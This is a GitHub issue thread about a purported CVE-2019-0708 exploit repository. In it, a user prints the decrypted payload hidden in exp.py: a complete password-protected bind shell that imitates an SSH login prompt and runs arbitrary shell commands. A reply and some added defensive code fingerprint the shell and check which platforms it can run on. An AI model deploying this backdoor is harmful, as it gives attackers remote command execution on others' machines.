at0mik / CVE-2019-0708-PoC

CVE-2019-0708-PoC is a semi-functional exploit capable of remotely accessing a Windows computer by exploiting the aforementioned vulnerability; this repository also contains notes on how to complete the attack.

What does the code mean here? #2

Closed zoujialan closed 5 years ago

zoujialan commented 5 years ago

https://github.com/at0mik/CVE-2019-0708-RCE/blob/58e90e9df15ccb77074900c501da8b72ee8aace8/exp.py#L335 After decryption:


```python
# Python 2 code: the `thread` module and str-typed socket sends do not exist in Python 3.
# `pwd` and `kill -9` also make it Unix-only, which matters for the question in this issue.
import socket
import pwd
import os
import thread
import subprocess
import sys

PORT = 1234
PASS = 'iamroot123654'

def connection(conn):
    # Imitates an SSH password prompt, then gates a command loop behind PASS.
    usr = pwd.getpwuid(os.getuid()).pw_name
    hst = socket.gethostname()
    conn.setblocking(1)
    conn.send("{}@{}'s password: ".format(usr, hst))
    passwd = conn.recv(1024)
    if passwd.strip('\r\n') == PASS:
        while True:
            usr = pwd.getpwuid(os.getuid()).pw_name
            pth = os.getcwd()
            conn.send('{}[{}] >> '.format(usr, pth))
            data = conn.recv(1024)
            if data.strip('\r\n') == 'quit' or data.strip('\r\n') == 'exit':
                conn.close()
                break
            elif data.strip('\r\n').startswith('killme'):
                os.system('kill -9 {}'.format(os.getpid()))
            elif data.strip('\r\n').startswith('cd'):
                try:
                    os.chdir(data.strip('\r\n')[3:])
                except:
                    conn.send('The system path cannot be found!\n')
            else:
                proc = subprocess.Popen(data.strip('\r\n'), shell=True,
                                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                        stdin=subprocess.PIPE)
                stdoutput = proc.stdout.read() + proc.stderr.read()
                conn.send(stdoutput)
    else:
        # Mimics the sshd failure message before dropping the connection.
        conn.send('Permission denied (publickey,password).\n')
        conn.close()

# Listener loop: binds PORT and hands each accepted connection to connection().
while True:
    try:
        s = socket.socket()
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(('', PORT))
        s.listen(5)
        while True:
            s.settimeout(2)
            try:
                conn, addr = s.accept()
            except socket.timeout:
                continue

            if conn:
                s.settimeout(None)
                thread.start_new_thread(connection, (conn,))

    except:
        pass
```

lanybass commented 5 years ago

It means that this chunk of Python code gets sent to port 3389 of the victim's server. Use your big toe to think: does the victim machine have the ability to execute Python code?
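Two checks a defender can take from this thread, as an added example that is not code from the repository or from either commenter: fingerprinting the pasted bind shell by its first bytes (a real sshd sends an "SSH-" identification string first; this shell sends a bare password prompt), and confirming from the decoded payload that it depends on Unix-only and Python-2-only features, which is the point of the reply above. The banner samples are constructed, not captured traffic.

```python
import re

# Constructed samples (not captured traffic): what a real sshd sends first,
# and what the bind shell pasted above sends first.
REAL_SSH_BANNER = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n"
FAKE_SSH_PROMPT = b"www-data@web01's password: "
FAKE_SSH_DENIED = b"Permission denied (publickey,password).\n"

# RFC 4253: a real SSH server's first line is "SSH-<protoversion>-<softwareversion>".
SSH_ID_RE = re.compile(rb"^SSH-\d\.\d-\S+")
# The pasted shell writes "<user>@<host>'s password: " with no protocol banner before it.
FAKE_PROMPT_RE = re.compile(rb"^[A-Za-z0-9_.\-]+@[A-Za-z0-9_.\-]+'s password: $")


def classify_first_bytes(data: bytes) -> str:
    """Label the first bytes read from a listener: 'ssh', 'fake-ssh-bind-shell' or 'unknown'."""
    if SSH_ID_RE.match(data):
        return "ssh"
    if FAKE_PROMPT_RE.match(data) or data == FAKE_SSH_DENIED:
        return "fake-ssh-bind-shell"
    return "unknown"


# Markers in the decoded payload showing it is a Python 2 program for a Unix host.
UNIX_ONLY_MARKERS = ("import pwd", "pwd.getpwuid", "kill -9")
PY2_ONLY_MARKERS = ("import thread", "thread.start_new_thread")


def payload_platform_markers(source: str) -> dict:
    """Return which Unix-only and Python-2-only markers appear in a decoded payload."""
    return {
        "unix_only": [m for m in UNIX_ONLY_MARKERS if m in source],
        "python2_only": [m for m in PY2_ONLY_MARKERS if m in source],
    }


def runs_on_windows(source: str) -> bool:
    """False when the payload depends on Unix-only modules or commands."""
    return not payload_platform_markers(source)["unix_only"]
```

Feed `classify_first_bytes` the first `recv()` from a suspicious listener, and `payload_platform_markers` the decoded string from exp.py, to check both claims made in this issue without executing anything.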